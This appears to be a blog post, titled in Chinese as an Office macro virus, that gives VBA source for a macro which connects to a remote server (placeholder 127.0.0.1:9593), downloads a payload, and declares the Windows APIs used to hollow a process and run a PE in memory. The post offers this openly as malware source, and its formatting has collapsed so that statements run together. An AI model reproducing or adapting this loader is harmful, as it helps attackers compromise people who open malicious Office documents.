一个远程下载并内存加载PE的office宏病毒

#If Win64 Then Public Declare PtrSafe Function WSAStartup Lib "ws2_32.dll" (ByVal wVersionRequested As Integer, ByRef data As WSADATA) As Long Public Declare PtrSafe Function connect Lib "ws2_32.dll" (ByVal socket As LongLong, ByVal SOCKADDR As LongLong, ByVal namelen As Long) As Long Public Declare PtrSafe Sub WSACleanup Lib "ws2_32.dll" () Private Declare PtrSafe Function GetAddrInfo Lib "ws2_32.dll" Alias "getaddrinfo" (ByVal NodeName As String, ByVal ServName As String, ByVal lpHints As LongLong, lpResult As LongLong) As Long Public Declare PtrSafe Function ws_socket Lib "ws2_32.dll" Alias "socket" (ByVal AF As Long, ByVal stype As Long, ByVal Protocol As Long) As Long Public Declare PtrSafe Function closesocket Lib "ws2_32.dll" (ByVal socket As Long) As Long Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long) Public Declare PtrSafe Function Send Lib "ws2_32.dll" Alias "send" (ByVal s As Long, ByRef buf As Any, ByVal buflen As Long, ByVal flags As Long) As Long Public Declare PtrSafe Function Recv Lib "ws2_32.dll" Alias "recv" (ByVal s As Long, ByRef buf As Any, ByVal buflen As Long, ByVal flags As Long) As Long Public Declare PtrSafe Function SendWithPtr Lib "ws2_32.dll" Alias "send" (ByVal s As Long, ByVal bufPtr As Long, ByVal buflen As Long, ByVal flags As Long) As Long Private Declare PtrSafe Function WSAGetLastError Lib "ws2_32.dll" () As Long Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (ByVal lDestination As LongPtr, ByVal sSource As LongPtr, ByVal lLength As Long) Private Declare PtrSafe Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hModule As LongPtr, ByVal lpFilename As String, ByVal nSize As Long) As Long Private Declare PtrSafe Function CreateProcess Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As LongPtr, ByVal lpThreadAttributes As LongPtr, ByVal bInheritHandles As Boolean, ByVal dwCreationFlags As Long, ByVal lpEnvironment As LongPtr, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long Private Declare PtrSafe Function GetThreadContext Lib "kernel32" (ByVal hThread As LongPtr, lpContext As CONTEXT) As Long Private Declare PtrSafe Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesRead As Long) As Long Private Declare PtrSafe Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As LongPtr, ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr Private Declare PtrSafe Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As Long) As Long Private Declare PtrSafe Function SetThreadContext Lib "kernel32" (ByVal hThread As LongPtr, lpContext As CONTEXT) As Long Private Declare PtrSafe Function ResumeThread Lib "kernel32" (ByVal hThread As LongPtr) As Long Private Declare PtrSafe Function TerminateProcess Lib "kernel32" (ByVal hProcess As LongPtr, ByVal uExitCode As Integer) As Long Public Declare PtrSafe Function NtUnmapViewOfSection Lib "ntdll.dll" (ByVal handleProcess As LongPtr, ByVal imageAddress As LongPtr) As Long Private Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)#Else Public Declare Function WSAStartup Lib "ws2_32.dll" (ByVal wVersionRequested As Integer, ByRef data As WSADATA) As Long Public Declare Function connect Lib "ws2_32.dll" (ByVal socket As Long, ByVal SOCKADDR As Long, ByVal namelen As Long) As Long Public Declare Sub WSACleanup Lib "ws2_32.dll" () Private Declare Function GetAddrInfo Lib "ws2_32.dll" Alias "getaddrinfo" (ByVal NodeName As String, ByVal ServName As String, ByVal lpHints As Long, lpResult As Long) As Long Public Declare Function ws_socket Lib "ws2_32.dll" Alias "socket" (ByVal AF As Long, ByVal stype As Long, ByVal Protocol As Long) As Long Public Declare Function closesocket Lib "ws2_32.dll" (ByVal socket As Long) As Long Private Declare Function CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long) As Long Public Declare Function Send Lib "ws2_32.dll" Alias "send" (ByVal s As Long, ByRef buf As Any, ByVal buflen As Long, ByVal flags As Long) As Long Public Declare Function Recv Lib "ws2_32.dll" Alias "recv" (ByVal s As Long, ByRef buf As Any, ByVal buflen As Long, ByVal flags As Long) As Long Public Declare Function SendWithPtr Lib "ws2_32.dll" Alias "send" (ByVal s As Long, ByVal bufPtr As Long, ByVal buflen As Long, ByVal flags As Long) As Long Private Declare Function WSAGetLastError Lib "ws2_32.dll" () As Long Private Declare Function VarPtrArray Lib "VBE7" Alias "VarPtr" (var() As Any) As Long Private Declare Sub RtlMoveMemory Lib "kernel32" (ByVal lDestination As Long, ByVal sSource As Long, ByVal lLength As Long) Private Declare Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hModule As Long, ByVal lpFilename As String, ByVal nSize As Long) As Long Private Declare Function CreateProcess Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Boolean, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long Private Declare Function GetThreadContext Lib "kernel32" (ByVal hThread As Long, lpContext As CONTEXT) As Long Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As Long, ByVal nSize As Long, ByVal lpNumberOfBytesRead As Long) As Long Private Declare Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As Long, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As Long) As Long Private Declare Function SetThreadContext Lib "kernel32" (ByVal hThread As Long, lpContext As CONTEXT) As Long Private Declare Function ResumeThread Lib "kernel32" (ByVal hThread As Long) As Long Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Integer) As Long Public Declare Function NtUnmapViewOfSection Lib "ntdll.dll" (ByVal handleProcess As Long, ByVal imageAddress As Long) As Long Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)#End If

#If Win64 Then Private Type WSADATA wVersion As Integer wHighVersion As Integer szDescription(0 To WSADESCRIPTION_LEN) As Byte szSystemStatus(0 To WSADESCRIPTION_LEN) As Byte iMaxSockets As Integer iMaxUdpDg As Integer lpVendorInfo As LongLong End Type Private Type ADDRINFO ai_flags As Long ai_family As Long ai_socktype As Long ai_protocol As Long ai_addrlen As Long ai_canonName As LongLong 'strptr ai_addr As LongLong 'p sockaddr ai_next As LongLong 'p addrinfo End Type#Else Private Type WSADATA wVersion As Integer wHighVersion As Integer szDescription(0 To WSADESCRIPTION_LEN) As Byte szSystemStatus(0 To WSADESCRIPTION_LEN) As Byte iMaxSockets As Integer iMaxUdpDg As Integer lpVendorInfo As Long End Type Private Type ADDRINFO ai_flags As Long ai_family As Long ai_socktype As Long ai_protocol As Long ai_addrlen As Long ai_canonName As Long 'strptr ai_addr As Long 'p sockaddr ai_next As Long 'p addrinfo End Type#End If

Enum AF AF_UNSPEC = 0 AF_INET = 2 AF_IPX = 6 AF_APPLETALK = 16 AF_NETBIOS = 17 AF_INET6 = 23 AF_IRDA = 26 AF_BTH = 32End Enum Enum sock_type SOCK_STREAM = 1 SOCK_DGRAM = 2 SOCK_RAW = 3 SOCK_RDM = 4 SOCK_SEQPACKET = 5End Enum

Function GetCode() Dim m_wsaData As WSADATA Dim m_RetVal As Integer Dim m_Hints As ADDRINFO Dim m_ConnSocket As Long: m_ConnSocket = INVALID_SOCKET Dim Server As String Dim port As String #If Win64 Then Dim pAddrInfo As LongLong #Else Dim pAddrInfo As Long #End If Dim RetVal As Long Dim lastError As Long RetVal = WSAStartup(MAKEWORD(2, 2), m_wsaData) If (RetVal <> 0) Then LogError "WSAStartup failed with error " & RetVal, WSAGetLastError() Call WSACleanup Exit Function End If m_Hints.ai_family = AF.AF_UNSPEC m_Hints.ai_socktype = sock_type.SOCK_STREAM Server = "127.0.0.1" port = "9593" RetVal = GetAddrInfo(Server, port, VarPtr(m_Hints), pAddrInfo) If (RetVal <> 0) Then LogError "Cannot resolve address " & Server & " and port " & port & ", error " & RetVal, WSAGetLastError() Call WSACleanup Exit Function End If m_Hints.ai_next = pAddrInfo Dim connected As Boolean: connected = False Do While m_Hints.ai_next > 0 'Do While 1 CopyMemory m_Hints, ByVal m_Hints.ai_next, LenB(m_Hints) m_ConnSocket = ws_socket(m_Hints.ai_family, m_Hints.ai_socktype, m_Hints.ai_protocol) If (m_ConnSocket = INVALID_SOCKET) Then LogError "Error opening socket, error " & RetVal Else Dim connectionResult As Long connectionResult = connect(m_ConnSocket, m_Hints.ai_addr, m_Hints.ai_addrlen) If connectionResult <> SOCKET_ERROR Then connected = True Exit Do End If LogError "connect() to socket failed" closesocket (m_ConnSocket) End If Loop If Not connected Then LogError "Fatal error: unable to connect to the server", WSAGetLastError() Call WSACleanup Exit Function End If 'Dim SendBuf() As Byte 'SendBuf = StrConv("Message #1", vbNarrow) '发送 Dim dataBuf As Variant dataBuf = Array(32, 42, 42, 5, 6) Dim dataLen As Integer: dataLen = UBound(dataBuf) - LBound(dataBuf) + 1 Dim sendBuf() As Byte ReDim sendBuf(dataLen) '打印发送的数据 Dim i As Long For i = 0 To dataLen - 1 sendBuf(i) = dataBuf(i) Debug.Print sendBuf(i); Next i RetVal = Send(m_ConnSocket, sendBuf(0), dataLen, 0) If RetVal = SOCKET_ERROR Then LogError "send() failed", WSAGetLastError() Call WSACleanup Exit Function Else Debug.Print "sent " & RetVal & " bytes" End If '接收 Dim payloadBuf() As Byte Dim recvBuf() As Byte Dim recvSize As Integer: recvSize = 32 ReDim recvBuf(recvSize) Dim recvLen As Integer: recvLen = 0 Dim index As Long: index = 0 Do While 1 recvLen = Recv(m_ConnSocket, recvBuf(0), recvSize, 0) 'For i = 0 To recvLen - 1 ' Debug.Print recvBuf(i); 'Next i 'Debug.Print If recvLen > 0 Then ReDim Preserve payloadBuf(index + recvLen) Call CopyMemory(ByVal VarPtr(payloadBuf(index)), ByVal VarPtr(recvBuf(0)), recvLen) index = index + recvLen Else Exit Do End If Loop '打印接收到的数据 Debug.Print "接收到的长度为："; Debug.Print UBound(payloadBuf) - LBound(payloadBuf) 'Debug.Print "接收到的数据为："; 'For i = 0 To index - 1 ' Debug.Print payloadBuf(i); '打印的时候加<;>则不换行 'Next i 'Debug.Print RetVal = closesocket(m_ConnSocket) If RetVal <> 0 Then LogError "closesocket() failed", WSAGetLastError() Call WSACleanup Else Debug.Print "closed socket" End If GetCode = payloadBufEnd Function